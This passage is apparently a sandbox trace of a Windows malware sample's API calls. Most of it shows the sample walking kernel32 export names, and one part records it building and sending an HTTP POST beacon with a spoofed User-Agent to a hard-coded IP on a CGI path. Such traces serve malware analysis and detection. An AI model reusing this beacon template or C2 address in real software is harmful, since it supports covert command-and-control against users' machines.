[0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0090.340] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0090.340] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0090.340] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0090.340] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0090.340] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0090.340] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0090.340] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0090.341] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0090.341] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0090.341] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0090.341] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0090.341] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0090.341] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0090.341] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0090.341] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0090.341] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0090.341] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0090.341] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0090.341] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0090.341] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0090.342] wsprintfA (in: param_1=0x12c0000, param_2="POST /%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s\r\nContent-Type: %s\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n\r\n" | out: param_1="POST /messages/kydbs.cgi?o=6hs&k=yw33&c=21nd HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\nHost: 91.218.114.4\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 49\r\nConnection: Keep-Alive\r\n\r\n") returned 256 [0090.342] send (s=0x418, buf=0x12c0000*, len=305, flags=0) returned 305 [0090.342] shutdown (s=0x418, how=1) returned 0 [0090.342] recv (in: s=0x418, buf=0x3c2f184, len=1, flags=0 | out: buf=0x3c2f184) returned 0 [0090.536] closesocket (s=0x418) returned 0 [0090.536] WSACleanup () returned 0 [0090.536] VirtualFree (lpAddress=0x12c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.537] VirtualFree (lpAddress=0x1140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.537] VirtualFree (lpAddress=0x1190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.537] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0090.538] lstrlenA (lpString="kernel32.dll") returned 12 [0090.538] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0090.538] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0090.538] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0090.538] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0090.538] lstrlenA (lpString="ADDATOMA") returned 8 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0090.538] lstrlenA (lpString="ADDATOMW") returned 8 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0090.538] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0090.538] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0090.538] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0090.538] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0090.538] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0090.538] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0090.539] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0090.539] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0090.539] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0090.539] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0090.539] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0090.539] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0090.539] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0090.539] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0090.539] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0090.539] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0090.539] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0090.539] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0090.539] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0090.539] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0090.539] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0090.540] lstrlenA (lpString="BACKUPREAD") returned 10 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0090.540] lstrlenA (lpString="BACKUPSEEK") returned 10 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0090.540] lstrlenA (lpString="BACKUPWRITE") returned 11 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0090.540] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0090.540] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0090.540] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0090.540] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0090.540] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0090.540] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0090.540] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0090.540] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0090.540] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0090.540] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0090.540] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0090.540] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0090.540] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0090.540] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0090.540] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0090.541] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0090.541] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0090.541] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0090.541] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0090.541] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0090.541] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0090.541] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0090.541] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0090.541] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0090.541] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0090.541] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0090.541] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0090.541] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0090.541] lstrlenA (lpString="BEEP") returned 4 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0090.541] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0090.541] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0090.541] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0090.541] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0090.541] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0090.542] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0090.542] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0090.542] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0090.542] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0090.542] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0090.542] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0090.542] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0090.542] lstrlenA (lpString="CANCELIO") returned 8 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0090.542] lstrlenA (lpString="CANCELIOEX") returned 10 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0090.542] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0090.542] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0090.542] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0090.542] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0090.542] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0090.542] lstrlenA (lpString="CHECKELEVATION") returned 14 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0090.542] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0090.542] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0090.542] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0090.542] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0090.543] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0090.543] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0090.543] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0090.543] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0090.543] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0090.543] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0090.543] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0090.543] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0090.543] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0090.543] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0090.543] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0090.543] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0090.543] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0090.543] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0090.543] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0090.543] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0090.543] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0090.543] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0090.543] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0090.544] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") 